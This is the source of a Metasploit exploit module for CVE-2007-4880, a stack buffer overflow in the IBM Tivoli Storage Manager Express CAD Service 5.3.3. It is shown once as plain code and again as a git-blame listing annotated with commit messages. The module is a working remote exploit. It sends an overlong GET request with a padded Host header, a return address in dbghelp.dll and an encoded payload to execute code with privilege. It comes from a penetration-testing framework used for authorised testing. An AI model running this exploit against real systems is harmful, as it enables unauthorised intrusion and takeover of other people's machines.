metasploit-framework/modules/exploits/windows/http/ibm_tsm_cad_header.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).
        By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-4880' ],
          [ 'OSVDB', '38161' ],
          [ 'BID', '25743' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 650,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 24 2007'))

    register_options( [ Opt::RPORT(1581) ], self.class )
  end

  def exploit
    connect

    sploit =  "GET /BACLIENT HTTP/1.1\r\n"
    sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)
    sploit << [target.ret].pack('V') + payload.encoded

    print_status("Trying target %s..." % target.name)

    sock.put(sploit + "\r\n\r\n")

    handler
    disconnect
  end

end
renamed module git-svn-id: file:///home/svn/framework3/trunk@7918 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-19 01:04:03 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
renamed module git-svn-id: file:///home/svn/framework3/trunk@7918 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-19 01:04:03 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = GoodRanking`
renamed module git-svn-id: file:///home/svn/framework3/trunk@7918 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-19 01:04:03 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
renamed module git-svn-id: file:///home/svn/framework3/trunk@7918 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-19 01:04:03 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).`
			`By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2007-4880' ],`
			`[ 'OSVDB', '38161' ],`
			`[ 'BID', '25743' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh',`
			`},`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 650,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Sep 24 2007'))`
renamed module git-svn-id: file:///home/svn/framework3/trunk@7918 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-19 01:04:03 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options( [ Opt::RPORT(1581) ], self.class )`
			`end`
renamed module git-svn-id: file:///home/svn/framework3/trunk@7918 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-19 01:04:03 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit = "GET /BACLIENT HTTP/1.1\r\n"`
			`sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)`
			`sploit << [target.ret].pack('V') + payload.encoded`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Trying target %s..." % target.name)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sock.put(sploit + "\r\n\r\n")`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`disconnect`
			`end`
renamed module git-svn-id: file:///home/svn/framework3/trunk@7918 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-19 01:04:03 +00:00
			`end`